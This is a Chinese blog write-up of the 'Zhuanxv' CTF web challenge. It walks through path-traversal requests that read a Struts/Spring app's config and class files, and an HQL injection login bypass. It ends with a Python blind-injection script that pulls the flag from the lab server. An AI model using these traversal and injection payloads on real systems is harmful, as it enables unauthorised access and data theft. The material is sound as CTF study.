xctf攻防世界 Web高手进阶区 Zhuanxv

已于 2022-08-17 17:11:46 修改
阅读量1.4k 收藏 5
点赞数 2
分类专栏: 攻防世界web之路 文章标签: 前端
于 2022-01-07 21:57:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/122372989
版权

1.进入环境,查看内容

在这里插入图片描述
没有什么其他信息,尝试dirsearch一下,如图:
在这里插入图片描述
发现有/list页面,我们尝试一下,发现让登录,如图:
在这里插入图片描述
猜测是需要想办法登入,从而拿到flag

2.问题分析

  1. 对内容进行抓包
    先forward,然后再通过action送入repeater,如图:
    在这里插入图片描述
    发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图:在这里插入图片描述
    通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的xml配置文件,于是构造payload:
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/web.xml

,是个下载文件,bg.jpg。(有人可能会问,为什么就知道xml位于那个位置,这是因为写web项目的时候有层级要求,一般效果如图:)在这里插入图片描述
static目录一般放置资源等,图片、文本等,一般上上级的WEB-INF会放配置文件,如图:在这里插入图片描述

  1. 分析xml文件信息
    使用vscode打开代码,如下:
<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_9" version="2.4"
         xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    <display-name>Struts Blank</display-name>
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <welcome-file-list>
        <welcome-file>/ctfpage/index.jsp</welcome-file>
    </welcome-file-list>
    <error-page>
        <error-code>404</error-code>
        <location>/ctfpage/404.html</location>
    </error-page>
</web-app>

可以看到,该项目使用的struts2框架(丫的老掉牙了),struts.xml是struts2的核心配置文件,该文件主要负责管理应用中的Action映射,以及该Action包含的Result定义等,因此我们需要读取struts.xml看看,构造payload:

http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/struts.xml

得到内容如下:

<?xml version="1.0" encoding="UTF-8"?>


<!DOCTYPE struts PUBLIC
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
        "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
    <constant name="strutsenableDynamicMethodInvocation" value="false"/>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    <constant name="struts.action.extension" value=","/>
    <package name="front" namespace="/" extends="struts-default">
        <global-exception-mappings>
            <exception-mapping exception="java.lang.Exception" result="error"/>
        </global-exception-mappings>
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
            <result name="error">/ctfpage/login.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
            <result name="success" type="stream">
                <param name="contentType">image/jpeg</param>
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
                <param name="inputName">downloadFile</param>
            </result>
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
        </action>
    </package>
    <package name="back" namespace="/" extends="struts-default">
        <interceptors>
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
            <interceptor-stack name="userAuth">
                <interceptor-ref name="defaultStack" />
                <interceptor-ref name="oa" />
            </interceptor-stack>


        </interceptors>
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
            <interceptor-ref name="userAuth">
                <param name="excludeMethods">
                    execute
                </param>
            </interceptor-ref>
            <result name="login_error">/ctfpage/login.jsp</result>
            <result name="list_error">/ctfpage/welcome.jsp</result>
            <result name="success">/ctfpage/welcome.jsp</result>
        </action>
    </package>
</struts>

可以看到有很多class,这就是所谓的映射文件,如 表示访问loadimage路径时候,会去找字节码com.cuitctf.action.DownloadAction文件去加载内容,我们一一构造payload:

http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/DownloadAction.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/AdminAction.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/UserOAuth.class

下载下来后请记得修改文件名称.class,然后在vscode中使用decompiler插件进行反编译,挨个查看后,发现UserLoginAction.class反编译出来的内容与登录页面最为相关,如图:在这里插入图片描述
其中引入了重要的几个包,因此构造payload,拿到源码:

http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/po/User.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/service/UserService.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/InitApplicationContext.class

User.class反编译后是一个Bean文件,UserLoginAction.class反编译后是登录验证逻辑文件,InitApplicationContext.class反编译后是类加载器文件,如图:
在这里插入图片描述
我们可以看到,加载应用的xml配置文件为applicationContext.xml,该文件一般是项目的启动配置文件,包括数据库等,同样构造payload,如下:

http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml

下载后可以得到文件代码,如下:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource">
        <property name="driverClassName">
            <value>com.mysql.jdbc.Driver</value>
        </property>
        <property name="url">
            <value>jdbc:mysql://localhost:3306/sctf</value>
        </property>
        <property name="username" value="root"/>
        <property name="password" value="root" />
    </bean>
    <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">
        <property name="dataSource">
            <ref bean="dataSource"/>
        </property>
        <property name="mappingLocations">
            <value>user.hbm.xml</value>
        </property>
        <property name="hibernateProperties">
            <props>
                <prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop>
                <prop key="hibernate.show_sql">true</prop>
            </props>
        </property>
    </bean>
    <bean id="hibernateTemplate" class="org.springframework.orm.hibernate3.HibernateTemplate">
        <property name="sessionFactory">
            <ref bean="sessionFactory"/>
        </property>
    </bean>
    <bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager">
        <property name="sessionFactory">
            <ref bean="sessionFactory"/>
        </property>
    </bean>
    <bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true">
        <property name="transactionManager">
            <ref bean="transactionManager"/>
        </property>
        <property name="transactionAttributes">
            <props>
                <prop key="add">PROPAGATION_REQUIRED</prop>
                <prop key="find*">PROPAGATION_REQUIRED,readOnly</prop>
            </props>
        </property>
    </bean>
    <bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl">
        <property name="hibernateTemplate">
            <ref bean="hibernateTemplate"/>
        </property>
    </bean>
    <bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl">
        <property name="userDao">
            <ref bean="userDAO"/>
        </property>
    </bean>            
</beans>

其中暴露了使用的数据库,数据库账号密码,且其中包含了user.hbm.xml等配置文件,同样我们将其下载出来:

http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/user.hbm.xml
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/service/impl/UserServiceImpl.class
http://111.200.241.244:57001/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/dao/impl/UserDaoImpl.class

可以看到user.hbm.xml暗示了flag在数据库中位置,如图:
在这里插入图片描述
UserServiceImpl.class反编译后,是对登录信息进行了过滤,如图:
在这里插入图片描述
UserDaoImpl.class反编译后,是对登录的sql查找,如图:
在这里插入图片描述
到这里已经尽力了,开始参考网上的wp了。

  1. 构造登录
    此处参考网上大佬的wp,上面图的sql语句使用HSQL,什么是HSQL,参考这里:https://www.cnblogs.com/fengyouheng/p/11013013.html。因此构造登录账号密码:
from User where name ='admin' or '1'>'0' or name like 'admin' and password = '" + password + "'

UserServiceImpl.class反编译后代码中是对空格进行了过滤,而sql中对回车自动过滤, 因此我们可以将空格字符换成%0A(ascii码表示换行符)。于是使用hackbar进行翻译,得到新的注入sql的payload:

admin'%0Aor%0A'1'>'0'%0Aor%0Aname%0Alike%0A'admin

因此用户名:admin’%0Aor%0A’1’>‘0’%0Aor%0Aname%0Alike%0A’admin
密码:123(随便)
注意一定要使用hackbar进行登录,用主页登录没有反应,如图:
在这里插入图片描述
登入后,界面如图:在这里插入图片描述
好像也没有什么可以得到的信息,接着跟着wp进行操作。

  1. 掏出脚本子
import requests
s=requests.session()
 
flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
        # (select ascii(substr(id, "+str(i)+", 1)) from Flag where id < 2) < '
        payload = "(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
        #print payload
        url="http://111.200.241.244:57001/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print(i,flag)
            break
        p=chr(j)

说实话,我一直不理解payload中的substr是想干嘛,而且id < 2是为了干什么。。。来个大佬解释一下!

结果如图:
在这里插入图片描述
结果为:sctf{C46E250926A2DFFD831975396222B08E}

3.总结

  • 代码审计
  • 字符绕过
  • 反编译
  • 构造payload
  • 脚本子

这个题好歹可以看懂,如有问题,欢迎留言讨论

l8947943
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql万能密钥_攻防世界-web-Zhuanxv(任意文件读取、万能密钥、sql盲注 )
weixin_28785509的博客
01-21 466
题目来源:XCTF 4th-SCTF-2018题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务进入场景后是一个显示时间的页面使用dirsearch扫描一下,发现隐藏目录list。命令:python3 dirsearch.py -u http://220.249.52.133:43210/ -e *访问list目录,发现是一个后台登录页面抓包发现背景图片是从后台加载的一张图片或者从网页...
攻防世界 web高手进阶 7分题 Zhuanxv
闵行小鱼塘
08-12 700
继续ctf的旅程,开始攻防世界web高手进阶的7分题,本文是Zhuanxv的writeup
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?fileName=web_login_bg.jpg ,找到任意文件下载点,下载一系列文件。这里限制了下载文件的后缀只有class xml jpg css等。 第三步:代码审计 根据github的commit记录 了解实现类的位置。 从user.hbm.xml得知表名和类名映射 从com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字 从com/cuitctf/dao/i
xctfZhuanxv
qq_40646572的博客
10-13 673
打开链接地址,发现就一个这,没任何提示。那就web目录先来一波扫描。发现了一个页面,先看下。是个后台登陆界面,大胆猜测存在弱口令?爆破失败。没办法了,先看看网页源码还有网络请求吧。看到这个请求是请求背景图片加载,看着和正常的图片加载感觉不太一样,是不是存在任意文件读取呢?尝试文件读取fuzz,失败。(有一说一,到这我就没思路了。。。。。我是真的菜。)看了官方writeup,发现github搜索了下Zhuanxv,可是我找到git项目的时候啥也没有就一个没用的默认用户和密码。
攻防世界 WEB ZHUANXV
qq_41696858的博客
09-07 387
打开场景,根据提示提示,扫描目录,扫出来一个/list,提示要先登录,先抓个包看看,在第二个包出抓到了形如/loadimage?fileName=web_login_bg.jpg 再熟悉不过了,文件包含,结合cookie里的phpsession和jsessionid可以判断出,后端同时使用了java和php 那么,既然是java项目,就尝试读取一下web.xml,这个是javaweb项目最基础的一个xml文件,一般再WEB-INF目录下 构造/loadimage?fileName=…/…/WEB-INF/w
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 849
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
XCTF crypto新手练习_1-12
H4ppyD0g的博客
07-17 1898
1 base64 把给的字符串用base64在线解码工具解码一下就得出flag。 知识点 Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。采用Base64编码具有不可读性,需要解码后才能阅读。 Base64编码规则: 它将每3个字节(3个 字符)(24位)转换为4个字符。因为6位二进制数可以表示64个不同的数,因此只要确定了字符集(含64个字符),并为其中的每个字...
攻防世界web高手进阶 supersqli
weixin_61835841的博客
04-26 372
提示:方法千千万,适合自己才是最强的! 工具 火狐 分析 看题目--随便注,supersqli 以及网页内容猜测是sql注入 1.输入1,发现变量为inject 2.查看网页源代码,发现提示sqlmap没有灵魂,意识到应该不能用sqlmap跑,尝试手工注入 3.输入 1' union select 1--+ 提示被过滤,preg_match可自行百度,过滤之后则不能用select这条命令 4,尝试堆叠注入 Stacked injections(堆叠注入)从名词的含义..
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf攻防世界 Web高手进阶 unfinish
l8947943的博客
01-02 4010
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
攻防世界-web萌新-FlatScience(python处理pdf、sqlite注入)-Hack.lu-2017
Sea_Sand息禅
04-15 5795
日常扫描: 进站后点击链接尝试会让下载pdf文件。(后面要用到pdf文件) 访问robots.txt: 再依次对这两个页面进行测试: admin.php无论如何输入都没有什么反馈 login.php在username中输入admin' union select database()时报错: 可以看到是sqlite数据库,表的结构和查询函数和MySQL有所不同。 在这里花了相当长的时间...
攻防世界-web writeup(xctf
菜的只能随便写写博客
07-15 2464
0x01 view source flag放在源码之中,但是网页的脚本限制了鼠标作用,无法点击和选中,直接F12或者浏览器快捷键查看网页源码即可得到flag flag:cyberpeace{e07dcafaeeb31df23b4d661dd4da56f9}   0x02 get_post GET和POST是http协议的两种主要请求方式 GET请求直接把参数包含在url中 POST...
[wp] 攻防世界-i-got-id-200
MercyLin的博客
09-10 3373
点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑: use strict; use warnings; use CGI; my $cgi= CGI->new; if ( $cgi->upload( 'file' ) ) { my $file= $cgi->param( 'file' ); while ( <$file> ) { print "...
攻防世界 easyphp
最新发布
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值